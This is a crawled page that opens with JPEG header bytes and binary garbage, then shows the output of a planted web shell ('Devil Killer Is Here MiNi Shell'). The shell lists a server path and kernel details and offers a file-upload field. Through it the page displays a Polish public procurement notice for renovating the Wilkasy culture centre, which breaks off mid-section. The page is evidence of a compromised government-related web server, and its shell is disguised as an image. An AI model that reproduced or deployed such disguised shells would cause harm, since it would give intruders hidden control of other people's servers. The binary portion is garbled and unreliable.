JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/0022275601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i modernizacja infrastruktury Gminnego Ośrodka Kultury i Rekreacji <br/>w Wilkasach w ramach projektu ,,Amplifikator kultury-zwiększamy zasięg” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Kultury i Rekreacji w Wilkasach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790220847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Olsztyńska 54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wilkasy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87/4282295</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gokir@ugg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugg.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i modernizacja infrastruktury Gminnego Ośrodka Kultury i Rekreacji <br/>w Wilkasach w ramach projektu ,,Amplifikator kultury-zwiększamy zasięg” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d08bba1-aa2d-4635-9d3f-bbba410cae61</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00222756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejskiego Funduszu Rozwoju Regionalnego realizowanego w ramach programu regionalnego Fundusze Europejskie dla Warmii i Mazur 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1107040 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1107040</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się pod adresem: https://platformazakupowa.pl/pn/gokir_wilkasy.<br/>2.We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania wskazanym w SWZ.<br/>3.Osobą uprawnioną do porozumiewania się z wykonawcami jest:<br/>w zakresie proceduralnym: Marzena Foltyn<br/>w zakresie merytorycznym: Karol Żelisko<br/>4.Komunikacja między Wykonawcą, a zamawiającym odbywa się za pośrednictwem https://platformazakupowa.pl/pn/gokir_wilkasy i<br/>formularza „Wyślij wiadomość do zamawiającego”.<br/>5.W sytuacji awarii Platformy lub niedostępności Platformy, uniemożliwiających komunikację poprzez System, Zamawiający<br/>dopuszcza komunikację za pomocą poczty elektronicznej na adres: gokir@ugg.pl,(nie dotyczy składania ofert).<br/>6.Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem<br/>https://platformazakupowa.pl/pn/gokir_wilkasy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi<br/>się komunikat, że wiadomość została wysłana do zamawiającego.<br/>7.Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>8.Zgodnie z art. 67 ustawy PZP, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy: stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych MSWindows, MacOsx10 4,<br/>Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0, włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej-kodowanie UTF8, Oznaczenie czasu odbioru<br/>danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób<br/>niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią<br/>oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta<br/>zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ<br/>nie został spełniony obowiązek narzucony w art. 221 Ustawy PZP.<br/>9.Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce Instrukcje dla Wykonawców na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45 instrukcje<br/>10.Informacje dotyczące odpowiedzi na pytania,zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na Platformie w sekcji Komunikaty. Korespondencja,której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca,będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>11.W uzasadnionych przypadkach Zamawiający może zmienić SWZ,które udostępnia na stronie internetowej/platformazakupowa.pl.<br/>12.Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzenia komunikatów i wiadomości bezpośrednio na Platformie<br/>przesyłanych przez Zamawiającego, gdyż system powiadomień mailowych może ulec awarii lub powiadomienie może trafić do<br/>folderu SPAM.<br/>13.W przypadku rozbieżności pomiędzy treścią niniejszej SWZ,a treścią udzielonych odpowiedzi czy wyjaśnień,jako obowiązującą<br/>należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych przetwarzanych w związku z udzieleniem<br/>zamówień publicznych jest Gminny Ośrodek Kultury i Rekreacji w Wilkasach,ul. Olsztyńska 54,11-500 Giżycko, numer telefonu<br/>874292295 lub adres email gokir@ugg.pl<br/>2.Dane kontaktowe inspektora ochrony danych:We wszystkich sprawach dotyczących przetwarzania danych osobowych<br/>kontaktować się można z IOD Panią Joanną Trusińską za pośrednictwem poczty email: gokir@ugg.pl lub pod numerem<br/>telefonu:223500140.3.Cel i podstawa prawna przetwarzania danych:<br/>Celem przetwarzania danych osobowych jest przeprowadzenie procedury udzielenia zamówienia publicznego, w szczególności<br/>weryfikacja okoliczności uzasadniających wykluczenie Wykonawcy z postępowania. Podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>4.Okres przechowywania danych:<br/>Dane osobowe przechowywane będą przez okres niezbędny do realizacji celów określonych w pkt.3 , czyli przez okres 4 lat od dnia<br/>zakończenia postępowania<br/>o udzielenie zamówienia, w przypadku wykonawców, którym Zamawiający nie udzielił zamówienia. W przypadku wykonawcy,<br/>którego oferta została wybrana jako najkorzystniejsza: okres równy okresowi gwarancji i rękojmi, nie krótszy jednak niż do dnia<br/>rozstrzygnięcia roszczeń stron. Dane osobowe są archiwizowane zgodnie<br/>z instrukcją kancelaryjną obowiązującą u administratora oraz ustawą z 14 lipca 1983 r. o narodowym zasobie archiwalnym i<br/>archiwach .<br/>5.Odbiorcy danych osobowych lub kategorie odbiorców:<br/>Dostęp do danych osobowych mogą uzyskać organy lub podmioty upoważnione na podstawie odrębnych przepisów, a także<br/>podmioty, które na podstawie zawartych przez administratora umów, świadczą usługi związane z przetwarzaniem danych<br/>osobowych. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o PZP.<br/>6.Prawa osób, których dane są przetwarzane:<br/>Osoby, których dane osobowe są przetwarzane przez GOKIR w związku z udzielaniem zamówień publicznych mają prawo do<br/>złożenia wniosku:<br/>•na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>•na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>•na podstawie art. 17 RODO o usunięcie danych przetwarzanych bezpodstawnie;<br/>•na podstawie art. 18 RODO o ograniczenie przetwarzania, przy czym wystąpienie<br/>z żądaniem ograniczenia przetwarzania nie ogranicza przewarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu;<br/>Osoba, której dane dotyczą ma prawo wniesienia skargi do organu nadzorczego, tj. Prezesa UODO, w tych przypadkach, gdy<br/>przetwarzanie danych narusza przepisy prawa.Osobom, których dane osobowe są przetwarzane przez GOKIR w związku z<br/>udzielaniem zamówień publicznych nie przysługuje prawo:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art.6ust.1lit.cRODO.<br/>7.Zamiar przekazania danych osobowych do państwa trzeciego lub organizacji międzynarodowej:<br/>Dane nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej z wyłączeniem sytuacji wynikających z<br/>przepisów prawa.<br/>8.Informacja o wymogu podania danych;Obowiązek podania przez Wykonawcę danych osobowych osób uprawnionych do<br/>reprezentowania Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy PZP związanym z udziałem w<br/>postępowaniu<br/>o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>9.Informacja o zautomatyzowanym podejmowaniu decyzji, w tym o profilowaniu:<br/>Administrator nie będzie podejmować decyzji w sposób zautomatyzowany,w tym profilować przetwarzanych danych osobowych.<br/>3.16.) RODO (ograniczenia stosowania): Patrz ogłoszenie RODO obowiązek informacyjny</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">3.16.) RODO (ograniczenia stosowania): Patrz ogłoszenie RODO obowiązek informacyjny</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOKIR.2601.02.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont i doposażenie pomieszczeń w Gminnym Ośrodku Kultury i Rekreacji w Wilkasach.<br/>1. Roboty przygotowawcze ( zabezpieczenie podłóg, demontaż i transport elementów umeblowania, wywiezienie gruzu),<br/>2. Ściany ( rozebranie ścianek działowych, skasowanie zacieków, usunięcie starej farby ze ścian, przygotowanie podłoża<br/>pod ocieplenie, wykonanie gładzi szpachlowych, tynku, malowanie ścian, wykucie wnęk, przepusty rurowe ppoż, wykonanie<br/>poziomej izolacji przeciwwilgociowej, montaż paneli akustycznych),<br/>3. Sufity (rozebranie podsufitki, zrobienie nowego sufitu podwieszanego z płyt gipsowo-kartonowych,ocieplenie, malowanie,<br/>położenie gładzi gipsowej, malowanie, montaż paneli akustycznych),<br/>4. Podłoga (rozebranie, gruntowanie, wyrównanie podłoża, położenie posadzki betonowe, pochylnia dla niepełnosprawnych,<br/>cokoliki z płytek ceramicznych),<br/>5. Podłoga z paneli ( rozebranie, izolacja przeciwwilgociowa, gruntowanie podłoża posadzka z paneli oraz parkiet ),<br/>6. Stolarka (wymiana podokienników, wykucie ościeżnic, montaż ościeżnic, drzwi zewnętrzne, drzwi wewnętrzne),<br/>7. Instalacja sanitarna (wymiana zaworu grzejnikowego, wymiana odcinka rury stalowej, demontaż grzejnika żeliwnego,<br/>montaż grzejników oraz ekranów zagrzejnikowych),<br/>8. Instalacje elektryczne (mechaniczne wykucie bruzd, wymiana przewodów wtykowych, przygotowanie podłoża pod oprawy<br/>oświetleniowe, wymiana opraw oświetleniowych, wymiana puszek podtynkowych, wykonanie, pomiar rezystancji izolacji<br/>elektrycznej, montaż kompletnego systemu gazex, sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego),<br/>9. Instalacja teletechniczna (mechaniczne wykucie bruzd dla przewodów wtynkowych, mechaniczne przebijanie otworów w<br/>ścianach, wymiana puszek podtynkowych, montaż gniazd instalacyjnych teletechnicznych, dostawa i montaż- patchpanel,<br/>patchord, Access Point, router udm, Wifi controller, szafa Rack, wykonanie instalacji teletechnicznej w zakresie zarobienia<br/>szafy, gniazd, powieszenie AccessPointów na sufitach, konfiguracja całego osprzętu),<br/>10. Dostawa wyposażenia (meble)<br/>III. Dokumentacja techniczna zawarta jest w załącznikach odpowiednio dla każdego zadania – foldery zip p.n. Zadanie 1 –<br/>Remont pomieszczeń i zakup wyposażenia w Gminnym Ośrodku Kultury i Rekreacji w Wilkasach, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">39130000-2 - Meble biurowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-06 do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert (kryteria są takie same dla wszystkich zadań):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Gwarancja(G)– waga kryterium 40 %.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>Cena (C) – waga 60 %<br/>C =cena najniższa brutto*/ cena oferty ocenianej brutto x 60 pkt<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu<br/>Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie<br/>w związku z realizacją przedmiotu zamówienia.<br/>Gwarancja (G) – waga 40 %<br/>Ogłoszenie nr 2025/BZP 00167739/01 z dnia 2025-03-28<br/>2025-03-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>Najkrótszy możliwy termin gwarancji wymagany przez Zamawiającego – 36 miesięcy.<br/>Za udzielenie gwarancji na okres:<br/>36 miesięcy wykonawca otrzyma – 0 pkt 48 miesięcy wykonawca otrzyma – 20 pkt 60 miesięcy wykonawca otrzyma – 40 pkt<br/>Wykonawca wpisze na druku oferty tylko jeden z powyższych terminów okresu gwarancji. Uwaga!<br/>• W przypadku zaproponowania przez Wykonawcę okresu gwarancji wynoszącego więcej niż 60 miesięcy oceniona będzie wartość<br/>60 miesięcy.<br/>• W przypadku, kiedy wykonawca w ofercie nie zaznaczy żadnego okresu gwarancji jakości, zamawiający przyjmie, że wykonawca<br/>udziela minimalnego okresu gwarancji jakości (tj. 36 miesięcy) i przyzna wykonawcy 0 pkt.<br/>• W przypadku błędnego wypełnienia oferty w zakresie udzielenia okresu gwarancji tj. wskazania innego okresu gwarancji niż: 36<br/>miesięcy, 48 miesięcy, 60 miesięcy (z wyjątkiem zdań powyżej), to okres udzielenia gwarancji zostanie przyjęty jako 36 miesięcy i<br/>Wykonawca otrzyma taką samą liczbę punktów, jak za 36 miesięcy.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>5. Całkowita liczba punktów (L), jaką może otrzymać dana oferta, zostanie obliczona<br/>wg poniższego wzoru: L = C + G.<br/>6. Zamawiający udzieli zamówienia Wykonawcy, który uzyska największą liczbę punktów (L)<br/>7. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub<br/>kosztu i innych kryteriów oceny ofert, Zamawiający wybiera spośród ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>8. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>9. Jeżeli nie można dokonać wyboru oferty w sposób o którym mowa w pkt 2, Zamawiający wzywa Wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>10. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień treści złożonych ofert oraz przedmiotowych<br/>środków dowodowych lub innych składanych dokumentów lub oświadczeń. Niedopuszczalne jest prowadzenie między<br/>Zamawiającym, a Wykonawcą negocjacji dotyczących złożonej oferty oraz,<br/>z uwzględnieniem art. 223 ust. 2 i art. 187, dokonywanie jakiejkolwiek zmiany w jej treści.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków 